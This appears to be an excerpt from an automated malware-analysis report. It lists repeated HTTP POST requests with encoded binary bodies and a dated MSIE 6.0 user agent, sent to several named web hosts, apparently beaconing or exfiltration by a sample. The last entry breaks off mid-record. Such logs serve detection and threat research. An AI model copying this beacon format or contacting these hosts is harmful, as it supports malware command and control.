                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 67 45 4f 48 61 6e 42 2f 31 57 63 37 77 46 37 51 67 77 7a 39 42 43 4f 49 6a 58 30 59 36 2f 70 2b 70 44 58 55 54 4a 46 38 77 4f 56 66 77 46 4e 4c 34 70 4a 49 4d 46 4f 2f 67 59 78 30 34 50 75 37 49 34 70 66 66 33 55 78 52 72 47 73 38 68 4a 70 6e 54 6c 5a 57 57 4a 68 73 30 4a 4c 72 79 36 39 35 37 55 74 75 42 4b 58 5a 46 37 46 75 4c 43 63 4d 49 66 67 61 72 34 7a 52 6a 77 41 6f 2b 7a 62 7a 31 4e 56 63 6d 58 49 5a 4f 4b 68 64 62 61 36 50 71 63 57 42 48 44 48 46 34 61 32 77 38 65 2f 54 4d 72 68 63 75 46 54 2f 77 4a 38 68 4d 42 6b 59 64 70 42 73 75 71 6e 5a 78 49 7a 6c 4a 39 36 45 2f 78 53 39 78 2f 53 79 6a 30 69 76 49 4d 56 67 33 31 48 72 54 59 4b 61 57 34 47 54 65 70 38 63 79 32 6e 48 6d 54 62 74 35 30 41 31 4a 71 51 48 78 78 6b 6f 58 6b 77 49 45 71 4f 74 6e 64 42 39 53 6e 68 6a 48 6d 52 43 79 71 54 51 72 59 35 53 43 4b 39 48 6f 5a 4b 6c 42 76 54 76 4c 42 6c 55 31 32 67 56 53 6a 4b 30 64 5a 6b 58 42 4f 58 45 37 58 54 53 33 46 41 62 67 6e 6c 79 4c 43 66 43 58 62 41 54 71 73 62 44 30 6d 33 44 55 78 6b 34 67 65 39 74 78 50 55 4a 2f 54 54 58 4e 56 42 7a 4f 32 79 61 76 45 53 45 5a 57 56 43 43 61 43 47 70 76 75 66 6a 32 70 56 62 6c 4b 4e 75 63 76 52 44 43 72 7a 5a 69 30 75 4e 50 50 5a 4b 4d 71 62 71 79 34 4d 58 70 51 73 7a 49 7a 38 42 6c 2f 62 44 31 30 6a 6e 6f 58 77 34 59 43 32 2b 73 43 59 64 46 46 38 68 41 2f 59 2f 48 45 74 72 68 68 6e 70 75 6d 4d 4f 58 38 48 43 6a 35 32 43 41 55 55 35 66 71 32 4c 69 7a 32 79 4e 34 67 6f 2b 4d 37 76 34 4b 6d 4b 49 39 36 47 71 53 6c 68 6a 56 4f 76 64 2f 30 65 66 78 35 70 67 38 36 30 34 38 41 71 6d 35 79 34 76 71 75 51 36 78 43 47 32 79 41 4d 55 63 76 74 51 3d Data Ascii: gEOHanB/1Wc7wF7Qgwz9BCOIjX0Y6/p+pDXUTJF8wOVfwFNL4pJIMFO/gYx04Pu7I4pff3UxRrGs8hJpnTlZWWJhs0JLry6957UtuBKXZF7FuLCcMIfgar4zRjwAo+zbz1NVcmXIZOKhdba6PqcWBHDHF4a2w8e/TMrhcuFT/wJ8hMBkYdpBsuqnZxIzlJ96E/xS9x/Syj0ivIMVg31HrTYKaW4GTep8cy2nHmTbt50A1JqQHxxkoXkwIEqOtndB9SnhjHmRCyqTQrY5SCK9HoZKlBvTvLBlU12gVSjK0dZkXBOXE7XTS3FAbgnlyLCfCXbATqsbD0m3DUxk4ge9txPUJ/TTXNVBzO2yavESEZWVCCaCGpvufj2pVblKNucvRDCrzZi0uNPPZKMqbqy4MXpQszIz8Bl/bD10jnoXw4YC2+sCYdFF8hA/Y/HEtrhhnpumMOX8HCj52CAUU5fq2Liz2yN4go+M7v4KmKI96GqSlhjVOvd/0efx5pg86048Aqm5y4vquQ6xCG2yAMUcvtQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 6c 77 6d 36 5a 68 35 76 76 47 65 63 6e 52 30 52 61 59 73 30 62 77 46 4f 4e 48 74 65 70 31 37 41 4d 76 45 6d 43 4c 49 73 78 41 59 4d 45 70 53 52 2b 48 50 37 77 31 69 38 5a 49 34 76 4c 74 59 67 50 6f 45 4c 6b 66 75 46 4d 46 64 75 79 2b 49 65 71 77 62 47 7a 49 49 63 4b 7a 4d 2f 49 48 30 6d 47 74 70 4c 53 39 58 31 64 4f 7a 7a 72 49 56 57 42 51 43 73 7a 61 64 53 31 73 35 59 45 67 73 6d 75 61 71 36 54 44 56 39 38 6b 71 58 58 56 68 74 38 61 75 4f 34 35 46 4e 48 50 49 62 74 41 51 43 30 6f 41 4d 4c 4a 38 34 58 4b 56 30 33 78 66 33 4b 71 57 34 76 76 77 62 43 6d 4b 58 39 62 73 5a 64 4d 37 78 72 65 35 77 64 50 30 52 65 6d 4f 5a 5a 76 63 45 79 4e 62 67 44 62 36 77 71 4c 31 31 66 58 37 34 6c 67 6e 35 68 58 4a 4e 32 42 69 77 68 6f 46 77 2b 64 48 35 32 61 33 74 4c 4b 70 50 53 68 78 71 5a 39 73 6b 6d 31 69 41 71 71 6c 72 4f 30 47 62 66 7a 62 35 49 70 4b 4e 32 56 57 6a 4f 73 2f 77 4b 64 78 62 4e 54 30 41 76 4c 49 44 32 62 68 36 2f 31 75 6e 64 37 38 4f 75 31 6b 59 59 4d 62 35 4e 76 4f 67 58 42 34 46 38 66 53 70 50 6c 65 35 44 61 7a 2f 44 46 6d 54 56 6a 53 5a 42 6b 6a 42 52 49 66 33 6e 69 49 6f 7a 64 4b 4a 67 6c 66 72 50 64 36 34 33 2f 4b 59 51 62 4d 6f 6f 61 42 34 6e 54 6a 7a 75 34 37 76 70 47 6b 4b 77 78 72 41 2b 33 46 63 41 5a 6e 6f 63 65 72 42 53 6c 4a 4e 32 72 53 65 4a 58 48 36 32 4b 39 57 6c 52 74 39 4b 41 7a 41 74 4a 37 34 4b 53 45 46 57 56 34 5a 48 4c 6b 67 75 72 63 78 48 32 64 43 43 4e 47 44 30 65 56 42 2b 4c 67 35 62 42 67 34 6c 42 34 58 58 4b 7a 6a 2b 45 36 45 66 5a 4e 62 58 48 4d 38 6e 55 39 4e 58 77 37 34 31 6b 4b 6d 64 4a 61 51 65 79 61 58 6f 2f 68 6c 39 6a 67 39 43 42 6c 55 4a 35 37 39 65 61 4a 45 66 7a 36 64 77 6d 6c 66 35 71 46 46 36 73 6b 36 6b 6c 52 35 74 61 37 35 6d 69 30 4d 34 68 47 41 Data Ascii: lwm6Zh5vvGecnR0RaYs0bwFONHtep17AMvEmCLIsxAYMEpSR+HP7w1i8ZI4vLtYgPoELkfuFMFduy+IeqwbGzIIcKzM/IH0mGtpLS9X1dOzzrIVWBQCszadS1s5YEgsmuaq6TDV98kqXXVht8auO45FNHPIbtAQC0oAMLJ84XKV03xf3KqW4vvwbCmKX9bsZdM7xre5wdP0RemOZZvcEyNbgDb6wqL11fX74lgn5hXJN2BiwhoFw+dH52a3tLKpPShxqZ9skm1iAqqlrO0Gbfzb5IpKN2VWjOs/wKdxbNT0AvLID2bh6/1und78Ou1kYYMb5NvOgXB4F8fSpPle5Daz/DFmTVjSZBkjBRIf3niIozdKJglfrPd643/KYQbMooaB4nTjzu47vpGkKwxrA+3FcAZnocerBSlJN2rSeJXH62K9WlRt9KAzAtJ74KSEFWV4ZHLkgurcxH2dCCNGD0eVB+Lg5bBg4lB4XXKzj+E6EfZNbXHM8nU9NXw741kKmdJaQeyaXo/hl9jg9CBlUJ579eaJEfz6dwmlf5qFF6sk6klR5ta75mi0M4hGA
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 55 7a 4e 64 44 34 79 4a 30 6d 63 43 4d 66 71 74 39 37 65 5a 30 35 39 45 57 79 56 6b 46 61 4a 6c 67 43 75 43 59 6f 70 53 56 4c 72 47 6b 45 4f 45 33 6d 43 44 7a 63 4b 4d 7a 53 74 47 30 31 50 6b 61 6b 42 46 4b 70 61 49 38 54 31 4b 55 66 6e 79 67 34 61 65 44 48 76 6f 49 72 62 41 6f 4e 4a 51 44 45 5a 6c 42 6d 39 38 39 33 59 51 31 2f 6f 64 38 64 35 6e 47 52 77 65 49 59 52 31 54 77 6b 42 69 64 42 32 77 35 58 75 66 54 39 72 77 78 57 68 6f 76 52 4c 50 7a 56 36 73 4c 30 63 62 4e 57 79 4c 77 57 31 62 41 58 46 52 66 50 42 4e 42 77 36 4f 33 35 63 4c 46 39 79 67 75 30 44 4d 75 31 63 70 61 49 6c 73 54 4d 67 52 4f 74 31 46 4e 78 41 4a 37 48 4d 55 47 37 43 61 72 43 59 34 59 6e 2b 64 38 69 42 78 58 53 78 31 33 61 4b 6f 50 6c 43 65 79 73 36 6f 55 39 38 6e 62 39 5a 32 71 61 37 38 48 47 66 52 62 65 54 43 37 4b 31 2b 58 6b 65 34 50 6d 6b 41 6e 2b 76 78 55 58 38 51 4f 62 49 37 6d 4c 4f 71 46 76 6a 52 49 6c 64 68 55 53 51 6f 4a 67 73 36 4c 45 5a 69 52 33 76 31 30 56 69 69 42 77 70 39 4e 30 4a 68 52 63 50 49 70 31 61 42 55 4d 53 59 51 30 6e 61 72 74 6f 74 39 63 75 70 4b 53 64 66 70 52 48 36 6a 56 47 4e 35 76 39 56 32 50 67 37 4b 37 64 31 2f 46 35 63 45 7a 48 76 65 2b 79 32 43 2b 36 53 38 50 41 2b 65 2f 63 6b 37 4c 46 49 49 72 6f 72 77 37 44 46 39 72 64 53 72 61 39 67 76 64 2b 39 32 59 63 76 6b 48 51 6f 79 54 6c 72 74 4d 7a 70 35 41 6c 6d 38 77 7a 45 76 61 73 4e 41 59 4d 5a 55 6e 61 44 33 73 59 36 65 6a 59 44 39 68 50 4e 4a 6b 59 66 30 49 62 37 45 52 69 74 42 6d 76 48 46 6a 38 54 69 38 58 55 75 38 6f 57 63 77 49 34 33 47 51 6e 6e 6a 57 5a 74 79 43 38 4f 45 38 35 71 48 55 51 51 3d 3d Data Ascii: UzNdD4yJ0mcCMfqt97eZ059EWyVkFaJlgCuCYopSVLrGkEOE3mCDzcKMzStG01PkakBFKpaI8T1KUfnyg4aeDHvoIrbAoNJQDEZlBm9893YQ1/od8d5nGRweIYR1TwkBidB2w5XufT9rwxWhovRLPzV6sL0cbNWyLwW1bAXFRfPBNBw6O35cLF9ygu0DMu1cpaIlsTMgROt1FNxAJ7HMUG7CarCY4Yn+d8iBxXSx13aKoPlCeys6oU98nb9Z2qa78HGfRbeTC7K1+Xke4PmkAn+vxUX8QObI7mLOqFvjRIldhUSQoJgs6LEZiR3v10ViiBwp9N0JhRcPIp1aBUMSYQ0nartot9cupKSdfpRH6jVGN5v9V2Pg7K7d1/F5cEzHve+y2C+6S8PA+e/ck7LFIIrorw7DF9rdSra9gvd+92YcvkHQoyTlrtMzp5Alm8wzEvasNAYMZUnaD3sY6ejYD9hPNJkYf0Ib7ERitBmvHFj8Ti8XUu8oWcwI43GQnnjWZtyC8OE85qHUQQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 67 45 4f 48 61 6e 42 2f 31 57 63 37 77 46 37 51 67 77 7a 39 42 43 4f 49 6a 58 30 59 36 2f 70 2b 70 44 58 55 54 4a 46 38 77 4f 56 66 77 46 4e 4c 34 70 4a 49 4d 46 4f 2f 67 59 78 30 34 50 75 37 49 34 70 66 66 33 55 78 52 72 47 73 38 68 4a 70 6e 54 6c 5a 57 57 4a 68 73 30 4a 4c 72 79 36 39 35 37 55 74 75 42 4b 58 5a 46 37 46 75 4c 43 63 4d 49 66 67 61 72 34 7a 52 6a 77 41 6f 2b 7a 62 7a 31 4e 56 63 6d 58 49 5a 4f 4b 68 64 62 61 36 50 71 63 57 42 48 44 48 46 34 61 32 77 38 65 2f 54 4d 72 68 63 75 46 54 2f 77 4a 38 68 4d 42 6b 59 64 70 42 73 75 71 6e 5a 78 49 7a 6c 4a 39 36 45 2f 78 53 39 78 2f 53 79 6a 30 69 76 49 4d 56 67 33 31 48 72 54 59 4b 61 57 34 47 54 65 70 38 63 79 32 6e 48 6d 54 62 74 35 30 41 31 4a 71 51 48 78 78 6b 6f 58 6b 77 49 45 71 4f 74 6e 64 42 39 53 6e 68 6a 48 6d 52 43 79 71 54 51 72 59 35 53 43 4b 39 48 6f 5a 4b 6c 42 76 54 76 4c 42 6c 55 31 32 67 56 53 6a 4b 30 64 5a 6b 58 42 4f 58 45 37 58 54 53 33 46 41 62 67 6e 6c 79 4c 43 66 43 58 62 41 54 71 73 62 44 30 6d 33 44 55 78 6b 34 67 65 39 74 78 50 55 4a 2f 54 54 58 4e 56 42 7a 4f 32 79 61 76 45 53 45 5a 57 56 43 43 61 43 47 70 76 75 66 6a 32 70 56 62 6c 4b 4e 75 63 76 52 44 43 72 7a 5a 69 30 75 4e 50 50 5a 4b 4d 71 62 71 79 34 4d 58 70 51 73 7a 49 7a 38 42 6c 2f 62 44 31 30 6a 6e 6f 58 77 34 59 43 32 2b 73 43 59 64 46 46 38 68 41 2f 59 2f 48 45 74 72 68 68 6e 70 75 6d 4d 4f 58 38 48 43 6a 35 32 43 41 55 55 35 66 71 32 4c 69 7a 32 79 4e 34 67 6f 2b 4d 37 76 34 4b 6d 4b 49 39 36 47 71 53 6c 68 6a 56 4f 76 64 2f 30 65 66 78 35 70 67 38 36 30 34 38 41 71 6d 35 79 34 76 71 75 51 36 78 43 47 32 79 41 4d 55 63 76 74 51 3d Data Ascii: gEOHanB/1Wc7wF7Qgwz9BCOIjX0Y6/p+pDXUTJF8wOVfwFNL4pJIMFO/gYx04Pu7I4pff3UxRrGs8hJpnTlZWWJhs0JLry6957UtuBKXZF7FuLCcMIfgar4zRjwAo+zbz1NVcmXIZOKhdba6PqcWBHDHF4a2w8e/TMrhcuFT/wJ8hMBkYdpBsuqnZxIzlJ96E/xS9x/Syj0ivIMVg31HrTYKaW4GTep8cy2nHmTbt50A1JqQHxxkoXkwIEqOtndB9SnhjHmRCyqTQrY5SCK9HoZKlBvTvLBlU12gVSjK0dZkXBOXE7XTS3FAbgnlyLCfCXbATqsbD0m3DUxk4ge9txPUJ/TTXNVBzO2yavESEZWVCCaCGpvufj2pVblKNucvRDCrzZi0uNPPZKMqbqy4MXpQszIz8Bl/bD10jnoXw4YC2+sCYdFF8hA/Y/HEtrhhnpumMOX8HCj52CAUU5fq2Liz2yN4go+M7v4KmKI96GqSlhjVOvd/0efx5pg86048Aqm5y4vquQ6xCG2yAMUcvtQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 53 72 75 39 69 78 58 7a 78 57 66 4f 74 50 31 78 2f 4b 6c 6a 48 51 34 73 38 66 73 6a 4c 48 2b 66 47 56 46 63 73 73 74 56 33 46 47 71 52 61 78 39 43 43 6f 42 33 37 6b 71 4a 48 69 33 4e 50 43 71 4a 34 4e 4e 71 30 4d 37 63 72 4e 5a 32 52 4d 43 4d 67 4a 54 38 59 76 74 41 31 6b 2b 56 6e 44 58 72 39 5a 6f 33 35 35 53 51 55 32 36 69 42 55 48 4b 4c 33 6d 62 6a 46 4b 31 50 69 56 7a 41 44 6e 5a 71 39 54 73 37 54 2f 69 57 34 4b 5a 49 78 36 56 44 47 7a 58 5a 6d 46 58 56 51 70 56 5a 2b 75 4d 54 70 4a 33 6a 4b 67 7a 5a 41 5a 41 45 48 48 7a 75 6e 4f 53 64 4c 44 76 35 6f 75 63 53 76 42 68 6e 76 35 31 70 7a 61 51 33 4e 68 47 2f 37 75 76 49 31 57 66 2f 4f 72 55 35 43 64 30 57 4c 52 48 4e 73 4b 34 34 47 39 41 78 79 6b 4e 52 38 6e 4f 38 39 37 30 37 31 58 35 71 69 42 6f 6b 4d 47 37 2f 56 75 77 46 70 49 4d 7a 43 6e 75 73 51 6d 52 4d 2b 74 51 35 61 4a 50 59 57 4e 30 2b 55 57 44 2f 74 58 63 41 33 66 53 4e 53 6c 49 66 50 6b 6c 50 61 6d 32 35 7a 49 46 43 5a 71 49 4b 4f 35 48 4e 63 4d 33 43 6a 76 6d 70 43 33 46 55 59 69 6a 36 2b 68 6b 2f 69 78 4c 54 2f 55 68 69 39 38 77 43 4b 6b 54 49 36 70 61 4f 76 46 6d 69 49 30 6a 56 50 43 77 66 4b 72 2f 37 4e 64 54 69 73 43 6c 5a 46 4e 79 48 4c 61 67 53 43 6b 76 6a 35 43 76 6a 4d 37 65 47 6d 34 7a 58 62 54 62 75 71 55 6a 50 61 79 69 67 76 64 66 57 44 4d 43 6a 33 65 6e 45 69 2f 74 5a 69 6a 63 6d 54 63 68 78 38 7a 4e 48 41 67 56 36 6c 6c 30 6d 55 4f 78 50 41 43 73 75 45 6e 65 55 35 64 7a 55 2b 63 58 31 67 38 31 73 41 4c 79 4b 79 2f 56 79 52 76 75 43 55 49 67 50 73 36 4e 77 37 54 4e 69 6c 33 4e 61 2f 6e 4e 75 62 59 62 52 31 2f 75 47 50 38 2f 4f 37 70 53 2b 50 72 56 78 32 52 5a 4f 6d 66 64 55 45 3d Data Ascii: Sru9ixXzxWfOtP1x/KljHQ4s8fsjLH+fGVFcsstV3FGqRax9CCoB37kqJHi3NPCqJ4NNq0M7crNZ2RMCMgJT8YvtA1k+VnDXr9Zo355SQU26iBUHKL3mbjFK1PiVzADnZq9Ts7T/iW4KZIx6VDGzXZmFXVQpVZ+uMTpJ3jKgzZAZAEHHzunOSdLDv5oucSvBhnv51pzaQ3NhG/7uvI1Wf/OrU5Cd0WLRHNsK44G9AxykNR8nO897071X5qiBokMG7/VuwFpIMzCnusQmRM+tQ5aJPYWN0+UWD/tXcA3fSNSlIfPklPam25zIFCZqIKO5HNcM3CjvmpC3FUYij6+hk/ixLT/Uhi98wCKkTI6paOvFmiI0jVPCwfKr/7NdTisClZFNyHLagSCkvj5CvjM7eGm4zXbTbuqUjPayigvdfWDMCj3enEi/tZijcmTchx8zNHAgV6ll0mUOxPACsuEneU5dzU+cX1g81sALyKy/VyRvuCUIgPs6Nw7TNil3Na/nNubYbR1/uGP8/O7pS+PrVx2RZOmfdUE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 55 7a 4e 64 44 34 79 4a 30 6d 63 43 4d 66 71 74 39 37 65 5a 30 35 39 45 57 79 56 6b 46 61 4a 6c 67 43 75 43 59 6f 70 53 56 4c 72 47 6b 45 4f 45 33 6d 43 44 7a 63 4b 4d 7a 53 74 47 30 31 50 6b 61 6b 42 46 4b 70 61 49 38 54 31 4b 55 66 6e 79 67 34 61 65 44 48 76 6f 49 72 62 41 6f 4e 4a 51 44 45 5a 6c 42 6d 39 38 39 33 59 51 31 2f 6f 64 38 64 35 6e 47 52 77 65 49 59 52 31 54 77 6b 42 69 64 42 32 77 35 58 75 66 54 39 72 77 78 57 68 6f 76 52 4c 50 7a 56 36 73 4c 30 63 62 4e 57 79 4c 77 57 31 62 41 58 46 52 66 50 42 4e 42 77 36 4f 33 35 63 4c 46 39 79 67 75 30 44 4d 75 31 63 70 61 49 6c 73 54 4d 67 52 4f 74 31 46 4e 78 41 4a 37 48 4d 55 47 37 43 61 72 43 59 34 59 6e 2b 64 38 69 42 78 58 53 78 31 33 61 4b 6f 50 6c 43 65 79 73 36 6f 55 39 38 6e 62 39 5a 32 71 61 37 38 48 47 66 52 62 65 54 43 37 4b 31 2b 58 6b 65 34 50 6d 6b 41 6e 2b 76 78 55 58 38 51 4f 62 49 37 6d 4c 4f 71 46 76 6a 52 49 6c 64 68 55 53 51 6f 4a 67 73 36 4c 45 5a 69 52 33 76 31 30 56 69 69 42 77 70 39 4e 30 4a 68 52 63 50 49 70 31 61 42 55 4d 53 59 51 30 6e 61 72 74 6f 74 39 63 75 70 4b 53 64 66 70 52 48 36 6a 56 47 4e 35 76 39 56 32 50 67 37 4b 37 64 31 2f 46 35 63 45 7a 48 76 65 2b 79 32 43 2b 36 53 38 50 41 2b 65 2f 63 6b 37 4c 46 49 49 72 6f 72 77 37 44 46 39 72 64 53 72 61 39 67 76 64 2b 39 32 59 63 76 6b 48 51 6f 79 54 6c 72 74 4d 7a 70 35 41 6c 6d 38 77 7a 45 76 61 73 4e 41 59 4d 5a 55 6e 61 44 33 73 59 36 65 6a 59 44 39 68 50 4e 4a 6b 59 66 30 49 62 37 45 52 69 74 42 6d 76 48 46 6a 38 54 69 38 58 55 75 38 6f 57 63 77 49 34 33 47 51 6e 6e 6a 57 5a 74 79 43 38 4f 45 38 35 71 48 55 51 51 3d 3d Data Ascii: UzNdD4yJ0mcCMfqt97eZ059EWyVkFaJlgCuCYopSVLrGkEOE3mCDzcKMzStG01PkakBFKpaI8T1KUfnyg4aeDHvoIrbAoNJQDEZlBm9893YQ1/od8d5nGRweIYR1TwkBidB2w5XufT9rwxWhovRLPzV6sL0cbNWyLwW1bAXFRfPBNBw6O35cLF9ygu0DMu1cpaIlsTMgROt1FNxAJ7HMUG7CarCY4Yn+d8iBxXSx13aKoPlCeys6oU98nb9Z2qa78HGfRbeTC7K1+Xke4PmkAn+vxUX8QObI7mLOqFvjRIldhUSQoJgs6LEZiR3v10ViiBwp9N0JhRcPIp1aBUMSYQ0nartot9cupKSdfpRH6jVGN5v9V2Pg7K7d1/F5cEzHve+y2C+6S8PA+e/ck7LFIIrorw7DF9rdSra9gvd+92YcvkHQoyTlrtMzp5Alm8wzEvasNAYMZUnaD3sY6ejYD9hPNJkYf0Ib7ERitBmvHFj8Ti8XUu8oWcwI43GQnnjWZtyC8OE85qHUQQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 79 6e 63 55 46 59 64 5a 34 32 65 61 75 52 53 71 74 6b 6e 56 31 6c 44 46 47 6b 64 39 4d 42 37 37 71 33 31 57 75 44 38 47 71 65 43 51 73 53 35 4e 79 49 31 30 51 5a 64 4c 35 51 4b 2f 4b 69 79 55 47 49 73 65 73 58 55 74 48 4a 57 77 6c 44 6a 75 39 38 4b 33 32 4c 71 34 6d 6b 35 4f 57 7a 42 70 46 71 42 63 53 41 6d 6b 52 52 6a 6e 4a 42 56 55 33 5a 6c 69 63 77 35 47 48 63 54 48 56 30 42 6d 44 52 55 5a 73 79 61 76 52 5a 62 73 39 44 4d 78 5a 74 6c 43 33 6a 42 34 70 71 4e 34 33 69 73 37 6b 66 6a 39 51 6d 63 42 38 67 4a 47 75 38 31 7a 56 45 72 72 36 62 51 4f 4d 64 35 78 32 6d 44 33 4e 34 79 6e 4d 66 6c 2b 45 2f 57 37 78 55 7a 4d 4f 58 51 6f 76 55 71 2b 61 6a 4a 34 62 79 4f 55 4b 7a 41 79 2b 74 63 74 4e 41 4b 62 58 63 64 71 5a 75 4d 36 6d 77 33 36 4a 71 4b 74 41 63 4b 47 6d 39 38 4c 65 4a 71 47 62 55 66 31 35 41 74 30 4a 49 7a 71 34 71 6c 6e 43 65 6d 34 6f 36 75 4b 51 79 6f 47 31 52 35 6a 62 56 63 47 49 69 7a 32 41 77 67 49 32 46 75 2f 58 74 66 64 6b 72 2f 30 67 47 59 70 45 6a 47 45 53 68 6f 67 76 4a 6a 4b 66 6f 47 65 66 4e 77 36 48 63 4a 6e 4e 42 61 4f 78 79 2b 41 49 76 71 63 73 73 37 34 41 31 4b 51 48 6a 33 5a 77 78 56 75 37 78 49 39 53 48 35 36 54 6c 5a 30 30 2b 37 4f 32 33 55 75 6e 4f 4a 59 76 53 65 44 34 39 75 52 4d 71 42 42 32 62 32 6a 54 57 79 55 79 30 73 73 78 2f 30 74 61 46 4b 6d 6f 34 70 32 6b 75 4e 52 7a 65 72 6e 42 37 75 74 42 62 46 53 63 6e 35 66 36 47 4b 69 6d 31 4b 30 33 72 70 37 74 37 35 72 54 33 4c 6f 62 61 34 55 32 6c 64 39 61 4b 7a 43 51 77 6d 4c 78 6d 6d 4c 34 49 77 76 73 48 33 64 56 64 30 34 46 64 4c 4f 4d 72 34 72 77 33 73 6f 46 67 37 74 4b 44 35 51 53 44 4b 75 46 58 6a 79 43 77 3d 3d Data Ascii: yncUFYdZ42eauRSqtknV1lDFGkd9MB77q31WuD8GqeCQsS5NyI10QZdL5QK/KiyUGIsesXUtHJWwlDju98K32Lq4mk5OWzBpFqBcSAmkRRjnJBVU3Zlicw5GHcTHV0BmDRUZsyavRZbs9DMxZtlC3jB4pqN43is7kfj9QmcB8gJGu81zVErr6bQOMd5x2mD3N4ynMfl+E/W7xUzMOXQovUq+ajJ4byOUKzAy+tctNAKbXcdqZuM6mw36JqKtAcKGm98LeJqGbUf15At0JIzq4qlnCem4o6uKQyoG1R5jbVcGIiz2AwgI2Fu/Xtfdkr/0gGYpEjGEShogvJjKfoGefNw6HcJnNBaOxy+AIvqcss74A1KQHj3ZwxVu7xI9SH56TlZ00+7O23UunOJYvSeD49uRMqBB2b2jTWyUy0ssx/0taFKmo4p2kuNRzernB7utBbFScn5f6GKim1K03rp7t75rT3Loba4U2ld9aKzCQwmLxmmL4IwvsH3dVd04FdLOMr4rw3soFg7tKD5QSDKuFXjyCw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 61 36 34 51 6b 51 34 51 33 32 63 2b 76 63 4c 69 6d 56 69 47 39 48 48 49 5a 73 67 4f 73 7a 38 6a 49 71 6c 73 33 48 6b 51 4f 4b 65 31 30 4d 6d 47 78 31 67 67 33 2b 7a 66 79 31 54 6d 56 34 4d 72 55 61 70 33 75 46 54 6d 6c 4b 4c 63 6d 69 59 30 74 72 53 55 52 33 5a 54 42 44 44 43 56 63 6e 73 36 69 61 49 55 69 36 71 51 32 36 36 73 35 39 6c 44 50 4b 69 63 62 56 37 41 7a 66 65 64 51 4a 64 32 68 63 51 50 49 45 67 54 68 32 30 73 68 36 58 37 62 44 72 78 44 51 77 77 73 6a 4d 6c 55 6b 33 62 6c 46 6a 37 30 56 57 2f 38 47 57 4f 6d 75 49 68 65 76 6b 6d 73 41 6d 37 76 49 34 61 73 6c 42 7a 78 4b 2b 6f 32 6f 72 6e 4b 6a 41 44 47 6e 79 70 37 6c 73 6c 43 55 6c 6c 4f 6f 32 51 6b 42 39 79 6b 68 57 49 49 70 45 4c 39 6b 66 31 72 63 53 6f 6f 64 30 52 2f 6e 50 74 43 50 78 56 49 41 5a 7a 46 51 6e 38 31 74 6e 51 42 6d 30 44 45 75 75 31 6e 34 4b 49 41 6d 35 48 35 34 50 52 2b 41 79 31 6c 38 31 75 71 54 6f 61 70 42 62 4c 61 57 50 2b 56 49 7a 47 67 70 62 47 5a 6f 6a 6e 70 30 51 4c 76 32 4e 54 58 63 70 30 31 64 4f 4d 74 66 4c 44 72 30 66 52 4d 43 39 41 77 71 67 4c 77 64 34 66 75 2b 65 31 47 76 39 38 51 73 70 71 46 56 30 31 75 36 69 51 73 43 53 70 62 6e 38 32 31 32 68 68 47 34 64 45 4e 75 4c 41 74 4d 39 4c 62 46 45 64 6a 44 62 61 63 6a 49 45 77 71 41 69 70 31 57 6c 57 63 74 42 79 2b 37 43 79 63 73 2b 6d 58 63 37 44 59 49 2f 4f 4c 44 4a 6b 35 59 65 4e 63 64 46 34 78 4a 6a 71 43 53 36 76 71 6c 63 2b 5a 61 4a 58 6f 73 37 70 7a 53 65 65 49 78 6c 59 66 55 2f 4b 4b 39 6f 35 58 58 77 38 5a 4a 41 38 69 4f 64 30 78 2f 45 36 34 59 2f 34 72 45 7a 48 79 4c 59 41 6e 73 6a 45 77 6f 67 53 58 67 70 62 43 61 74 44 4d 62 67 70 46 5a 36 4d 47 47 64 49 34 6e 7a 6c 45 30 48 6b 2b 33 62 56 32 59 Data Ascii: 